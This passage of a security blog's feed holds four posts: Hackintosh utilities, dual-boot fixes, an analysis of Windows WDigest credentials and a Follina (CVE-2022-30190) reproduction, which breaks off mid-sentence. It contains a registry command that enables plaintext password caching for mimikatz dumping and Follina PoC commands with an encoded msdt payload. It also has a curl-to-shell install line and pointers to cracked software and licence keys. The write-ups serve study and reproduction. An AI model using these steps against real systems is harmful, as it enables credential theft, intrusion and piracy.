<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/img_convert/8ba3e95f30711a4d9397800037e6777e.png"></p><p>Mechrevo Z2 Hackintosh conversion project part 2 - utilities</p><h1 id="Mac实用工具"><a href="#Mac实用工具" class="headerlink" title="Mac实用工具"></a>Mac utilities</h1><p>This is the second part of the old-laptop conversion project: installing some everyday software and some penetration testing tools, arming the soul to make it a real productivity machine</p><p>First, a website recommendation: <a href="http://www.mactools.app/">www.mactools.app</a>, which has most of the common software and some pentest tools, all "processed" and ready to use</p><p><img src="https://img-blog.csdnimg.cn/img_convert/e170c75557d264b5be15e2457e07d736.png" alt="截屏2023-02-14 15.26.37"></p><p>Another site is the Mechrevo Hackintosh forum, which also provides software tips and software downloads</p><ul><li><a href="https://www.cmbs-soft.com/category/userful-skills">Useful tips</a></li><li><a href="https://www.cmbs-soft.com/category/developer-tools">Useful software</a></li></ul><p><img src="https://img-blog.csdnimg.cn/img_convert/d9d8dca22f4bab7473e14b341ae8ae54.png" alt="截屏2023-02-14 16.46.24"></p><p>Beyond that, some software and the problems I ran into</p><ol><li><p>Homebrew</p><p>Homebrew is a free and open-source package management system that simplifies installing software on macOS; think of it as Linux apt-get/yum</p><p>Installation is very simple; ready-made install commands are available online</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/bin/zsh -c <span class="string">"<span class="subst">$(curl -fsSL https://gitee.com/cunkai/HomebrewCN/raw/master/Homebrew.sh)</span>"</span></span><br></pre></td></tr></table></figure><p>After installation, other tools can be installed through brew; related tool list: <a href="https://www.cnblogs.com/simono/p/16629284.html">link</a></p><p>Environments such as Python, Java and Go can also be installed through brew, which is very convenient</p></li><li><p>VMware Fusion: not much to say, it is a virtual machine host. On macOS Parallels Desktop is a somewhat nicer option, but VMware's strength is that VMs it creates can generally be used interchangeably on macOS and Windows, and VMware is friendlier when it comes to "freeloading"; a quick search online finds it</p><p>Since my old Windows machine had more than ten VMs, they can all be found directly via File - Scan for Virtual Machines</p><p>If they cannot be imported, try the following method</p><ul><li>Add the suffix .vmwarevm to the name of the whole directory, then double-click it to open it directly in Fusion</li></ul><p>If that still fails, export an OVF file on Windows</p><ol><li><p>On Windows, export the VM as an Open Virtualization Format .ovf file</p></li><li><p>Three files are produced in total: .ovf, .mf, .vmdk</p></li><li><p>Copy these three files to the Mac</p></li><li><p>Import the VM with Fusion</p></li></ol><p>Also, after installing VMware it crashed on launch; I later found a fix</p><blockquote><p>Open Finder, then Applications, find VMware Fusion, right-click (secondary click), choose Show Package Contents, go into Contents, then Library, find the file "Deploy V‎Mware Fusion.mpkg", double-click to run it and complete the wizard. Double-click VMware Fusion again and it no longer crashes</p></blockquote></li><li><p>Parallels Desktop</p><p>A virtual machine host better suited to macOS, <a href="https://luoxx.top/archives/pd-18-active">activation method</a></p></li><li><p>Typora</p><p>In my opinion the best document tool, bar none. The latest version is paid; just download the earlier beta version instead</p><ol><li><p>Windows 64bit (exe)</p><p><a href="https://link.zhihu.com/?target=https://download.typora.io/windows/typora-setup-x64-0.11.18.exe">https://download.typora.io/windows/typora-setup-x64-0.11.18.exe</a></p></li><li><p>Windows 32bit (exe)</p><p><a href="https://link.zhihu.com/?target=https://download.typora.io/windows/typora-setup-ia32-0.11.18.exe">https://download.typora.io/windows/typora-setup-ia32-0.11.18.exe</a></p></li><li><p>MacOS</p><p><a href="https://link.zhihu.com/?target=https://download.typora.io/mac/Typora-0.11.18.dmg">https://download.typora.io/mac/Typora-0.11.18.dmg</a></p></li><li><p>Linux</p><p><a href="https://link.zhihu.com/?target=https://download.typora.io/linux/typora_0.11.18_amd64.deb">https://download.typora.io/linux/typora_0.11.18_amd64.deb</a></p></li></ol></li><li><p>iStat Menus</p><p>Shows basic machine information in the menu bar</p><p><a href="https://gist.github.com/yutao8/bc64680dbeb5f5ba17475b5c4f717e55">iStat Menus for mac License</a></p><p><img src="https://img-blog.csdnimg.cn/img_convert/40494168385380f4a986ef292f4395e5.jpeg" alt="iStat Menus 6.6 affiche les températures des Mac M1 | MacGeneration"></p></li><li><p>Screen recording to GIF</p><ul><li><p>You can use <a href="https://www.cockos.com/licecap/">licecap</a> directly; the downside is that it cannot capture the dock at the bottom</p></li><li><p>Record the screen with QuickTime Player, then convert the mov video to a gif with ffmpeg; the command is as follows</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ffmpeg -i file.mov -r 15 
file.gif</span><br></pre></td></tr></table></figure></li></ul></li></ol><p><img src="https://img-blog.csdnimg.cn/6af074c49a8e4c2ea4913845183d1d70.png" alt="在这里插入图片描述"></p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/img_convert/8ba3e95f30711a4d9397800037e6777e.png"></p>
<p>Mechrevo Z2 Hackintosh conversion, part 2: useful software</p>
<h1 id="Mac实用工具</summary>
<category term="Hackintosh" scheme="https://oceansec.github.io/categories/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
<category term="Hackintosh" scheme="https://oceansec.github.io/tags/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
</entry>
<entry>
<title>Mechrevo Hackintosh conversion, part 4: external monitor and wrong Windows time</title>
<link href="https://oceansec.github.io/2023/12/05/%E5%8F%8C%E7%B3%BB%E7%BB%9F%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92-%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3%E7%AF%87/"/>
<id>https://oceansec.github.io/2023/12/05/%E5%8F%8C%E7%B3%BB%E7%BB%9F%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92-%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3%E7%AF%87/</id>
<published>2023-12-05T02:59:04.854Z</published>
<updated>2023-02-20T10:55:18.700Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/9e2650d2eea947c39aeca1dbc790e72b.png" alt="image"></p><h1 id="问题"><a href="#问题" class="headerlink" title="Problems"></a>Problems</h1><h2 id="1-无法外接显示器"><a href="#1-无法外接显示器" class="headerlink" title="1. No external monitor"></a>1. No external monitor</h2><p>The biggest remaining problem is that I cannot drive an external monitor. On most Mechrevo laptop models the HDMI and DP ports are wired physically to the discrete GPU: the internal panel is driven by the integrated GPU, external outputs go through the dGPU, and an NVIDIA dGPU cannot be driven on a Hackintosh. Worse, the Type-C port on this Mechrevo was cost-reduced and carries no video signal at all. Whether this applies to you depends on the model: check whether your BIOS can switch graphics modes (dGPU direct output vs. hybrid mode, where the dGPU renders and the iGPU outputs).</p><p>After a lot of searching I found only one compromise: a USB 3.0 external graphics adapter (USB display adapter) built on DisplayLink.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/7f768bc17356ada490b4f779f46cf82c.png" alt="img"></p><p>DisplayLink</p><blockquote><p>DisplayLink is a technology for connecting monitors to a computer over USB, making it simple to attach several displays. It extends the desktop over USB and supports up to six monitors at 32-bit color and arbitrary resolutions.</p><p>DisplayLink installs its own driver, which emulates additional display devices in the OS, sends the frame data over USB to an external DisplayLink chip, and converts it there into a DisplayPort or HDMI signal to drive the monitors.</p></blockquote><p>This does get an external screen working, but because DisplayLink compresses the video stream in software it depends on the CPU; when the picture changes rapidly it needs considerably more CPU than a static image and may lag.</p><p>USB display adapters are also not cheap. Those under about 100 RMB generally do not contain a DisplayLink chip and top out at 1080p at 60 Hz; the newest DisplayLink DL-6000 series supports 4K at 60 Hz. The <a href="https://www.synaptics.com/products/displaylink-graphics/displaylink-products-list">product list</a> on the DisplayLink site shows docks built on the DL-6950 chip. Check the chip before buying; second-hand units turn up on Xianyu and Taobao.</p><p>Since M1 Macs also support only one external display, people have used DisplayLink to add screens there too: <a href="https://xujiwei.com/blog/2021/07/m1-displaylink-testing/">Dual 4K displays: M1 MacBook Pro + DisplayLink performance test</a>. A Hackintosh user ran into the same problem: <a href="https://www.iots.vip/post/displaylink-hub.html">link</a>.</p><h2 id="2-双系统Windows时间不正确"><a href="#2-双系统Windows时间不正确" class="headerlink" title="2. Wrong time in dual-boot Windows"></a>2. Wrong time in dual-boot Windows</h2><p>After installing both systems I noticed that the Windows clock was wrong after every boot, eight hours slow. The reason is that Windows and macOS interpret the hardware clock (RTC) differently: Windows treats the RTC as local time, whereas macOS treats it as UTC and derives local time from it. For Beijing time (GMT+8) macOS shows RTC + 8 hours, so when two systems share one PC each keeps "correcting" the RTC to its own convention and one of them is always off.</p><p>Fix:</p><p>Press Win+X, open a Command Prompt as administrator, paste the command below (a right-click in the CMD window pastes) and press Enter. It tells Windows to treat the RTC as UTC, the same convention macOS uses:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Reg add HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation /v RealTimeIsUniversal /t REG_DWORD /d 1</span><br></pre></td></tr></table></figure><p>Reboot afterwards. The change is made on the Windows side because macOS offers no switch to write local time into the RTC instead.</p><p><img src="https://img-blog.csdnimg.cn/a2f8e34dc109445eb05ee5f1126aa780.png" alt="image"></p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/9e2650d2eea947c39aeca1dbc790e72b.png" alt="image"></p>
<h1 id="问题"><a href="#问题" class="headerl</summary>
<category term="Hackintosh" scheme="https://oceansec.github.io/categories/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
<category term="Hackintosh" scheme="https://oceansec.github.io/tags/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
</entry>
<entry>
<title>A brief look at the Windows credential mechanism</title>
<link href="https://oceansec.github.io/2023/12/05/windows%E5%87%AD%E8%AF%81%E6%9C%BA%E5%88%B6%E6%B5%85%E6%9E%90/"/>
<id>https://oceansec.github.io/2023/12/05/windows%E5%87%AD%E8%AF%81%E6%9C%BA%E5%88%B6%E6%B5%85%E6%9E%90/</id>
<published>2023-12-05T02:59:04.852Z</published>
<updated>2022-09-14T09:19:31.410Z</updated>
<content type="html"><![CDATA[<p><img src="https://s2.loli.net/2022/09/08/61wuRfy4nZWcVrB.png"></p><p>We know that on Windows 8.1 / Server 2012 R2 and later, where WDigest credential caching is disabled by default, mimikatz cannot retrieve the plaintext password; WDigest caching has to be switched on through the registry first. This article uses WinDbg to look at what actually changes in memory when that happens.</p><p>Before debugging, some basics of the Windows credential mechanism.</p><h1 id="Windows凭证机制"><a href="#Windows凭证机制" class="headerlink" title="Windows credential mechanism"></a>Windows credential mechanism</h1><h2 id="关键基础设施"><a href="#关键基础设施" class="headerlink" title="Key components"></a>Key components</h2><h3 id="SAM文件"><a href="#SAM文件" class="headerlink" title="The SAM file"></a>The SAM file</h3><p>The SAM (Security Account Manager) is the database file in which Windows stores local account passwords. To avoid leaking plaintext, the SAM holds hashes derived from the password rather than the password itself: the <strong>LM hash (obsolete) and the NT hash (usually called the NTLM hash), which is the MD4 of the UTF-16LE-encoded password, 128 bits long and written as 32 hexadecimal characters</strong>. When a user logs on locally or remotely, the hash computed from the supplied password is compared with the one stored in the SAM. On later Windows versions the hashes in the SAM are additionally encrypted with the SYSKEY (boot key).</p><ul><li>On disk the SAM lives at C:\windows\system32\config\sam</li><li>The SAM file is locked once Windows is running and cannot be moved or copied through normal file operations</li><li>The SAM holds the hashes of local accounts, including the built-in system accounts. Other secrets that credential dumping goes after, such as service-account passwords, scheduled-task credentials and passwords saved by Internet Explorer or other applications, are stored elsewhere: in the LSA secrets of the SECURITY hive or in DPAPI-protected Credential Manager stores</li></ul><h3 id="Lsass进程"><a href="#Lsass进程" class="headerlink" title="The lsass process"></a>The lsass process</h3><p>The Local Security Authority Subsystem Service (LSASS) is the process in Microsoft Windows that enforces the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, creates access tokens, and so on. "Dumping lsass" means dumping the memory of the lsass process to recover the credential material cached there: NT hashes, Kerberos keys and, when WDigest caching is on, the plaintext logon password.</p><h2 id="Windows认证流程"><a href="#Windows认证流程" class="headerlink" title="Windows authentication flow"></a>Windows authentication flow</h2><h3 id="Windows本地认证"><a href="#Windows本地认证" class="headerlink" title="Local authentication"></a>Local authentication</h3><p><img src="https://s2.loli.net/2022/09/08/EGyOcXRplBtfCZw.png" alt="Screenshot 2022-09-07 16.17.06"></p><p>The local logon flow is shown above. After boot or logoff the logon screen appears to accept the user's input; winlogon.exe manages logon and logoff. When the user types a password and logs on:</p><ol><li>winlogon.exe hands the account name and password to lsass.exe, which keeps the credentials in its own memory</li><li>lsass.exe hashes the plaintext into an NT hash and compares it with the SAM database</li></ol><p>If the two match, logon succeeds; otherwise it fails. Two problems follow from this flow:</p><ol><li>lsass.exe caches the plaintext password in its memory (through the WDigest provider, see below), which is why older systems give up plaintext passwords directly</li><li>Authentication is based on the NT hash. The NTLM challenge/response is computed from the hash alone, never from the password, so the hash is password-equivalent: an attacker who obtains it by any means can use it to authenticate to other systems on the network without knowing the password. This is the pass-the-hash (PTH) attack</li></ol><p>Note: besides local authentication there is NTLM-based network authentication and Kerberos-based domain authentication.</p><h1 id="什么是Wdigest?"><a href="#什么是Wdigest?" class="headerlink" title="What is WDigest?"></a>What is WDigest?</h1><p>WDigest is Digest Authentication, a challenge/response protocol introduced with Windows Server 2003 and used mainly for LDAP and web-based authentication; it runs over HTTP and over Simple Authentication and Security Layer (SASL) exchanges. The problem with WDigest is that its security package keeps a copy of the logon password in LSASS memory, and keeps it there whether or not Digest authentication is ever used.</p><p>On Windows 7 / Server 2008 R2 and earlier, WDigest caching is always on and cannot be turned off until update KB2871997 is installed, which adds the UseLogonCredential switch. Starting with Windows 8.1 / Server 2012 R2 Microsoft ships that switch disabled by default.</p><p>So on Windows 8.1 / Server 2012 R2 and later, where WDigest caching is off, capturing a plaintext password means: modify the registry + force a lock screen + wait for the administrator to log on again = plaintext password.</p><p>The registry change:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f</span><br></pre></td></tr></table></figure><p>It can also be made via PowerShell, msf and so on. Note that setting UseLogonCredential to 1 is a well-known indicator that EDR products and Sysmon/Sigma rules alert on; defenders should monitor that value for changes.</p><p>For an analysis of how mimikatz implements sekurlsa::wdigest, see: <a href="https://www.anquanke.com/post/id/235232">Debugging the mimikatz source: the wdigest function step by step</a></p><h1 id="windbg调试"><a href="#windbg调试" class="headerlink" title="WinDbg debugging"></a>WinDbg debugging</h1><p>WinDbg is Microsoft's free source-level debugger. It supports kernel-mode and user-mode debugging as well as analysis of dump files.</p><p>Documentation and download: <a href="https://docs.microsoft.com/zh-cn/windows-hardware/drivers/debugger/debugger-download-tools">https://docs.microsoft.com/zh-cn/windows-hardware/drivers/debugger/debugger-download-tools</a></p><p>You cannot simply attach WinDbg to <code>lsass</code> on a live system: if you do, Windows stops working and warns that the system is about to restart, and with LSA protection (RunAsPPL) enabled a user-mode debugger cannot attach at all. So we attach a kernel debugger instead and switch from ring 0 into the <code>lsass</code> process context.</p><h2 id="双机远程调试环境搭建"><a href="#双机远程调试环境搭建" class="headerlink" title="Setting up two-machine remote debugging"></a>Setting up two-machine remote debugging</h2><p>Lab setup</p><ul><li>Windows 11 physical host + WinDbg</li><li>Windows 10 virtual machine (bridged networking)</li></ul><p>Microsoft references:</p><p>The old way uses a COM (serial) port:</p><ul><li><a href="https://blog.csdn.net/youyudexiaowangzi/article/details/122012424">Two-machine debugging of a Win7 VM in VMware from Win10 with WinDbg</a></li></ul><p>The new way uses a network connection:</p><ul><li><p><a href="https://docs.microsoft.com/zh-cn/windows-hardware/drivers/debugger/setting-up-a-network-debugging-connection-automatically">Setting up KDNET network kernel debugging automatically</a></p><p>Note: the computer running the debugger is called the <em>host computer</em> and the computer being debugged the <em>target computer</em>. For automatic setup the host must run Windows 7 or later and the target Windows 8 or later.</p></li><li><p><a href="https://docs.microsoft.com/zh-cn/windows-hardware/drivers/debugger/setting-up-a-network-debugging-connection">Setting up KDNET network kernel debugging manually</a></p></li></ul><p>Now the configuration. I used the most basic option, a COM serial port connection.</p><ol><li><p>Add a serial port to the target VM backed by a named pipe. The pipe name must start with <code>\\.\pipe\</code>; the rest can be any short name you will remember.</p><p><img src="https://s2.loli.net/2022/09/08/ptucLK1w4MINJGX.jpg" alt="QQ screenshot 20220907182836"></p></li><li><p>Configure the debug settings inside the target machine.</p><p>bcdedit clones the default boot entry into a new one that will be used for debugging (note that <code>bcdedit /enum</code> shows no entry called "default": <code>{default}</code> is a well-known identifier alias, not a display name).</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bcdedit /copy {default} /d "vmdebug"</span><br></pre></td></tr></table></figure><p>Output: The entry was successfully copied to {7985b4ec-581d-11ec-bee9-8214e8b021aa}</p><p>Copy this id into a document on the host for later.</p><p>After a reboot there is now an extra boot entry, but it flashes past; set a timeout so the system stops at the boot menu:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bcdedit /timeout 10</span><br></pre></td></tr></table></figure><p>With the timeout the boot menu stays for 10 seconds and then falls through to the default entry.</p><p><img src="https://s2.loli.net/2022/09/08/KlSOPVeMntgiAId.jpg" alt="QQ screenshot 20220907195034"></p><p>Reboot into the vmdebug entry and turn debugging on for that entry only, so the default boot environment stays untouched:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bcdedit /dbgsettings serial baudrate:115200 debugport:2</span><br></pre></td></tr></table></figure><p>debugport is the serial port number of the VM; the screenshot from the VM configuration shows Serial Port 2, so debugport is 2. If you are not sure, set one value and change it if the debugger cannot connect. Note that <code>/dbgsettings</code> applies globally to all boot entries; what is per entry is the <code>/debug</code> switch:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bcdedit /debug {ID} ON</span><br></pre></td></tr></table></figure><p>ID is the id generated by <code>bcdedit /copy</code> when vmdebug was created; it can also be looked up with <code>bcdedit /enum</code>.</p><p>Reboot and stop at the boot menu.</p></li><li><p>Connect with WinDbg</p><p><img src="https://s2.loli.net/2022/09/08/LA3MBqdhDwyebTo.jpg" alt="QQ screenshot 20220907184645"></p><p>If WinDbg keeps reporting busy, press Ctrl+Break (Fn+Pause on an 87-key keyboard) to break in and get the debugger prompt.</p><p><img src="https://s2.loli.net/2022/09/08/l1E6mjVfdycK75I.jpg" alt="QQ screenshot 20220907195034"></p></li></ol><p>Tips:</p><ol><li>Kernel debugging needs two machines (or a host and a VM)</li><li>WinDbg Preview is more pleasant to use than the classic WinDbg</li><li>Wait until the target reaches the password prompt before breaking in; only then does the lsass process exist</li></ol><h2 id="调试分析"><a href="#调试分析" class="headerlink" title="Debugging analysis"></a>Debugging analysis</h2><p><strong>Command reference</strong></p><p><a href="https://www.cnblogs.com/gaochundong/p/windbg_cheat_sheet.html">WinDbg command cheat sheet</a></p><p><a href="https://bbs.pediy.com/thread-270324.html">WinDbg in detail</a></p><ol><li><p>Once the kernel debugger is attached, find the <code>EPROCESS</code> address of the <code>lsass</code> process: <code>!process 0 0 lsass.exe</code></p><p><img src="https://s2.loli.net/2022/09/08/87GabPLCyzDOvWR.png" alt="Screenshot 2022-09-07 19.55.18"></p></li><li><p>With the <code>EPROCESS</code> address (<code>ffff9d01325a7080</code>) switch the debug session into the context of the <code>lsass</code> process. <code>/i</code> makes the switch invasive (the debugger asks you to continue with <code>g</code> once, and then breaks back in inside lsass), <code>/p</code> resolves the process's page tables and <code>/r</code> reloads user-mode symbols:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.process /i /p /r ffff9d01325a7080</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/09/08/SWclqVnfgLioCeU.png" alt="Screenshot 2022-09-07 19.58.19"></p></li><li><p>Use <code>lm</code> to list the loaded modules and confirm that the user-mode modules of lsass (lsasrv.dll, wdigest.dll and friends) are now visible, i.e. that we are looking at the lsass address space</p><p><img src="https://s2.loli.net/2022/09/08/M4z2PwaxrOypDIj.png" alt="Screenshot 2022-09-07 19.58.56"></p></li></ol><p>Dump credentials with mimikatz before enabling WDigest caching:</p><p><img src="https://s2.loli.net/2022/09/09/RfNX8KFEx1oawvH.jpg" alt="QQ screenshot 20220909135851"></p><p>Then enable UseLogonCredential in the registry and look at the change in memory:</p><p><img src="https://s2.loli.net/2022/09/08/lrVumxJvWwPHGIa.png"></p><p>(image from Anquanke)</p><p>Lock the screen, wait for the user to log on again, and dump again: now the stored plaintext password comes out.</p><p><img src="https://s2.loli.net/2022/09/09/qDBjCwa3XnfQGMy.png" alt="ssss"></p><p>Two analyses of how the mimikatz wdigest module is implemented:</p><p><a href="https://xz.aliyun.com/t/8268">Exploring Mimikatz, part 1: WDigest</a></p><p><a href="https://www.anquanke.com/post/id/180126">A deep dive into Mimikatz: WDigest</a></p><p>References</p><p><a href="https://www.anquanke.com/post/id/220991">The Windows credential mechanism</a></p><p><a href="https://www.anquanke.com/post/id/86928">Compromising the Windows kernel with the WinDbg local kernel debugger</a></p>]]></content>
<summary type="html"><p><img src="https://s2.loli.net/2022/09/08/61wuRfy4nZWcVrB.png"></p>
<p>We know that on Windows 8.1&#x2F;Server 2012 R2 and later, where WDigest credential caching is disabled by default, mimikatz cannot retrieve the plaintext pa</summary>
<category term="Windows" scheme="https://oceansec.github.io/categories/Windows/"/>
<category term="windows,mimikatz" scheme="https://oceansec.github.io/tags/windows-mimikatz/"/>
</entry>
<entry>
<title>Reproducing Windows MSDT RCE (CVE-2022-30190)</title>
<link href="https://oceansec.github.io/2023/12/05/Windows%20MSDT%20RCE(CVE-2022-30190)%E5%A4%8D%E7%8E%B0/"/>
<id>https://oceansec.github.io/2023/12/05/Windows%20MSDT%20RCE(CVE-2022-30190)%E5%A4%8D%E7%8E%B0/</id>
<published>2023-12-05T02:59:04.850Z</published>
<updated>2022-08-13T12:34:05.510Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png"></p><h2 id="介绍"><a href="#介绍" class="headerlink" title="Introduction"></a>Introduction</h2><blockquote><p>A malicious Office file uses the remote-template feature to fetch a malicious HTML file from a remote web server, which then runs malicious PowerShell through the Microsoft Support Diagnostic Tool (MSDT). The vulnerability can invoke MSDT even when macros are disabled, and when the malicious file is saved as RTF it can also be triggered through the preview pane of Windows Explorer, executing arbitrary code on the target without the file ever being opened.</p></blockquote><p>With this RCE, code could (at the time of writing) be executed as a non-administrator, with macros disabled and with Windows Defender enabled, which is enough to get a C2 implant running.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">RTF stands for Rich Text Format. It is a document format similar to DOC (Word) with good cross-application compatibility; the WordPad accessory in Windows can open and edit it. Opening an RTF file in WordPad shows the document content; to see the RTF source, open the file in Notepad.</span><br></pre></td></tr></table></figure><p>Affected versions:</p><blockquote><p>It is hard to enumerate every Office version affected by this CVE, and Microsoft has not yet published the exact scope. Antiy CERT analysts verified that the following versions are affected:</p><p>Microsoft Office 2013 Service Pack 1 (64-bit edition)</p><p>Microsoft Office 2013 Service Pack 1 (32-bit edition)</p><p>Microsoft Office 2016 (64-bit edition)</p><p>Microsoft Office 2016 (32-bit edition)</p><p>Microsoft Office LTSC 2021 for 32-bit edition</p><p>Microsoft Office LTSC 2021 for 64-bit edition</p></blockquote><h2 id="复现"><a href="#复现" class="headerlink" title="Reproduction"></a>Reproduction</h2><p>The version I reproduced on is Microsoft Office LTSC Professional Plus 2021.</p><p>PoC: <a href="https://github.com/chvancooten/follina.py">https://github.com/chvancooten/follina.py</a></p><p>It offers several execution modes.</p><p>Usage:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">$ python .\follina.py -h</span><br><span class="line">usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] -t {rtf,docx} [-u URL] [-H HOST] [-P PORT]</span><br><span class="line"></span><br><span class="line">options:</span><br><span class="line"> -h, --help show this help message and exit</span><br><span class="line"></span><br><span class="line">Required Arguments:</span><br><span class="line"> -m {command,binary}, --mode {command,binary}</span><br><span class="line"> Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command</span><br><span class="line"></span><br><span class="line">Binary Execution Arguments:</span><br><span class="line"> -b BINARY, --binary BINARY</span><br><span class="line"> The full path of the binary to run. Can be local or remote from an SMB share</span><br><span class="line"></span><br><span class="line">Command Execution Arguments:</span><br><span class="line"> -c COMMAND, --command COMMAND</span><br><span class="line"> The encoded command to execute in "command" mode</span><br><span class="line"></span><br><span class="line">Optional Arguments:</span><br><span class="line"> -t {rtf,docx}, --type {rtf,docx}</span><br><span class="line"> The type of payload to use, can be "docx" or "rtf"</span><br><span class="line"> -u URL, --url URL The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost". Disables web server if custom URL scheme or path are specified</span><br><span class="line"> -H HOST, --host HOST The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)</span><br><span class="line"> -P PORT, --port PORT The port to run the HTTP server on, defaults to 80</span><br></pre></td></tr></table></figure><ul><li><p>Run a command</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python .\follina.py -m <span class="built_in">command</span> -c calc -t docx</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/b255e56ca734f37ba56985cc7d97c00e.png" alt="image-20220606220321985"><br>The -c argument can be given the Cobalt Strike PowerShell stager to get a CS beacon</p></li><li><p>Run a binary</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python follina.py -m binary -b \windows\system32\calc.exe -H 0.0.0.0 -P 8080 -t docx</span><br></pre></td></tr></table></figure></li></ul><p>Open the generated docx:<br><img src="https://img-blog.csdnimg.cn/img_convert/52204d8d2d549cbf29c1076e3f670805.png" alt="image-20220606215023535"></p><h2 id="Poc-分析"><a href="#Poc-分析" class="headerlink" title="PoC analysis"></a>PoC analysis</h2><h3 id="分析-Python-代码"><a href="#分析-Python-代码" class="headerlink" title="The Python code"></a>The Python code</h3><p>First, payload_url is built from the IP and port given with -H and -P; the URL points at the generated exploit.html.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/a74a2b4773ae44de7d5444e7a101566c.png" alt="image-20220606110009491"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/79a9bc8b1f3d70ec7d20b0002fffa665.png" alt="image-20220606105230171"></p><p>In the code above, command mode builds a string starting with <code>ms-msdt:</code> and then calls generate docx, which simply splices payload_url into the document.xml-rels.tpl template and packs the result into a Word file.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c8c5bf8230467442fdd4de5472b6a2cd.png" alt="image-20220606105620823"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/532ebc7441d786f8b00d35aa3da95670.png" alt="image-20220606104815928"></p><p>Anyone who has built phishing documents before will recognise the logic: a remote template address is written into <code>word\_rels\document.xml.rels</code>, see <a href="https://blog.csdn.net/q20010619/article/details/121661703">Using Cobalt Strike, part 3: user-driven (phishing) attacks</a>.</p><p>Now exploit.html itself: the <code>ms-msdt</code> string is placed inside a <code>&lt;script&gt;</code> tag, which navigates the page to that URI scheme.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/584e545d58843cb4274b2f59a6d15af1.png" alt="image-20220606110227146"></p><h3 id="ms-msdt-协议"><a href="#ms-msdt-协议" class="headerlink" title="The ms-msdt protocol"></a>The ms-msdt protocol</h3><p>In the registry, the handler command for the scheme is <code>"%SystemRoot%\system32\msdt.exe" %1</code>, so the whole URI is handed to msdt.exe as its argument string.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/72c087a49df08f5404f692fe41ef82f1.png" alt="image-20220606111600611"></p><p>msdt.exe is the Microsoft Support Diagnostic Tool; see the <a href="https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/msdt">documentation</a>.</p><p>Comparing the documented syntax with the payload:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msdt.exe /id PCWDiagnostic /skip force /param <span class="string">"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=<span class="subst">$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+')</span>)'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"</span></span><br></pre></td></tr></table></figure><ul><li><code>/id PCWDiagnostic</code> runs the PCWDiagnostic (Program Compatibility) troubleshooting pack</li><li><code>/skip force</code> skips the initial prompt, and <code>/param</code> passes parameters into the pack</li><li><code>IT_BrowseForFile=$( ... 